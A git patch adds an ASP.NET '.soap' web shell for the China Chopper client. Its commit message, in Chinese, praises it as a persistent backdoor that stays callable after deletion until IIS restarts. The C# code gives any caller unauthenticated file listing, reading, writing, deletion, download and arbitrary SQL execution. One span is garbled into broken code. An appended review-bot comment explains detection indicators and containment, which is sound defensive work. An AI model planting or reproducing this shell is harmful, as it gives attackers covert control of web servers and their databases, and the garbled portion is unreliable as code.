From aa4698855755fab752e73a0b25af4f858ba23c59 Mon Sep 17 00:00:00 2001 From: tennc Date: Tue, 5 Apr 2016 12:42:19 +0800 Subject: [PATCH] Create Customize.soap MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit from : zone.wooyun.org author : RedFree 1、.soap文件只有放在web根目录时才能顺利调用,放到子目录中会报错! 这个错误我并未解决,且待更深入的学习吧。。。 2、.soap调用一次后,即便把这个文件删除,方法依然存在且可调用,除非重启IIS!(很好的后门咩) 3、针对不同的.NET版本,以上代码有可能报错,可自行修改。 4、因无法搞定GET/POST传参的异常,如果要使用菜刀去连接,你需要写一个简单的中转脚本。 --- caidao-shell/Customize.soap | 316 ++++++++++++++++++++++++++++++++++++ 1 file changed, 316 insertions(+) create mode 100644 caidao-shell/Customize.soap diff --git a/caidao-shell/Customize.soap b/caidao-shell/Customize.soap new file mode 100644 index 0000000..fe6e773 --- /dev/null +++ b/caidao-shell/Customize.soap 
@@ -0,0 +1,316 @@ +<%@ WebService Language="C#" Class="Control" %> +using System; +using System.Web; +using System.IO; +using System.Net; +using System.Text; +using System.Data; +using System.Data.SqlClient; +using System.Collections.Generic; +using System.Diagnostics; +using System.Web.SessionState; +using System.Web.Services; +using System.Xml; +using System.Web.Services.Protocols; + +[WebService(Namespace = "http://www.wooyun.org/whitehats/RedFree")] +[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)] + +[Serializable] +public class Control : MarshalByRefObject +{ + public Control() + { + + } + [WebMethod(Description="Customize Script")] + public string Chopper(String z, String z1, String z2, String z3) { + String Z = z; + String result = ""; + if (Z != "") + { + String Z1 = z1; + String Z2 = z2; + String Z3 = z3; + String R = ""; + try + { + switch (Z) + { + case "A": + { + String[] c = Directory.GetLogicalDrives(); + R = String.Format("{0}\t", HttpContext.Current.Server.MapPath("/")); + for (int i = 0; i < c.Length; i++) + R += c[i][0] + ":"; + break; + } + case "B": + { + DirectoryInfo m = new DirectoryInfo(Z1); + foreach (DirectoryInfo D in m.GetDirectories()) + { + R += String.Format("{0}/\t{1}\t0\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss")); + } + foreach (FileInfo D in m.GetFiles()) + { + R += String.Format("{0}\t{1}\t{2}\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"), D.Length); + } + break; + } + case "C": + { + StreamReader m = new StreamReader(Z1, Encoding.Default); + R = m.ReadToEnd(); + m.Close(); + break; + } + case "D": + { + StreamWriter m = new StreamWriter(Z1, false, Encoding.Default); + m.Write(Z2); + R = "1"; + m.Close(); + break; + } + case "E": + { + if (Directory.Exists(Z1)) + { + Directory.Delete(Z1, true); + } + else + { + File.Delete(Z1); + } + R = "1"; + break; + } + case "F": + { + result += "\x2D\x3E\x7C"; + HttpContext.Current.Response.WriteFile(Z1); 
+ result += "\x7C\x3C\x2D"; + return result; + } + case "G": + { + byte[] B=new byte[Z2.Length/2]; + for (int i=0;i 0) + { + DataRowCollection rows = ds.Tables[0].Rows; + for (c = 0; c < ds.Tables[0].Columns.Count; c++) + { + R += String.Format("{0}\t|\t", ds.Tables[0].Columns[c].ColumnName.ToString()); + } + R += "\r\n"; + for (i = 0; i < rows.Count; i++) + { + for (c = 0; c < ds.Tables[0].Columns.Count; c++) + { + R += String.Format("{0}\t|\t", rows[i][c].ToString()); + } + R += "\r\n"; + } + } + ds.Clear(); + ds.Dispose(); + } + else + { + SqlCommand cm = Conn.CreateCommand(); + cm.CommandText = Z2; + cm.ExecuteNonQuery(); + R = "Result\t|\t\r\nExecute Successfully!\t|\t\r\n"; + } + Conn.Close(); + break; + } + default: goto End; + } + } + catch (Exception E) + { + R = "ERROR:// " + E.Message; + } + result += "\x2D\x3E\x7C" + R + "\x7C\x3C\x2D"; + End: ; + } + return result; + } + public void CP(String S, String D) + { + if (Directory.Exists(S)) + { + DirectoryInfo m = new DirectoryInfo(S); + Directory.CreateDirectory(D); + foreach (FileInfo F in m.GetFiles()) + { + File.Copy(S + "\\" + F.Name, D + "\\" + F.Name); + } + foreach (DirectoryInfo F in m.GetDirectories()) + { + CP(S + "\\" + F.Name, D + "\\" + F.Name); + } + } + else + { + File.Copy(S, D); + } + } +}
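Review bot: `Chopper` performs every operation on caller-controlled input with no authentication, authorization or path restriction — `Directory.Delete(Z1, true)` and `File.Delete(Z1)` in case "E", `new StreamWriter(Z1, false, ...)` writing `Z2` in case "D", `Response.WriteFile(Z1)` in case "F" and the SqlClient branch executing `Z2` verbatim — so what this commit adds is an unauthenticated remote file/database backdoor rather than a service with a fixable defect, and nothing here is suitable for deployment. For detection, the indicators visible in this hunk are a `<%@ WebService ... Class="Control" %>` directive inside a `.soap` file, a single `[WebMethod]` that imports `System.IO`, `System.Diagnostics` and `System.Data.SqlClient` and dispatches on a one-letter opcode, and the `"\x2D\x3E\x7C"` / `"\x7C\x3C\x2D"` (`->|` / `|<-`) framing around every response. The commit message's own observation that the method stays callable after the file is deleted until IIS restarts matters for incident response: removing the file is not containment, the application pool must be recycled or IIS restarted and the compiled output under the Temporary ASP.NET Files directory inspected. The catch block returns `E.Message` to the caller, so failures disclose internal paths and database error text. Part of the hunk is corrupted in this rendering (case "G" collapses into `for (int i=0;i 0)`), so the process-execution and SQL-connection portions are not fully visible here.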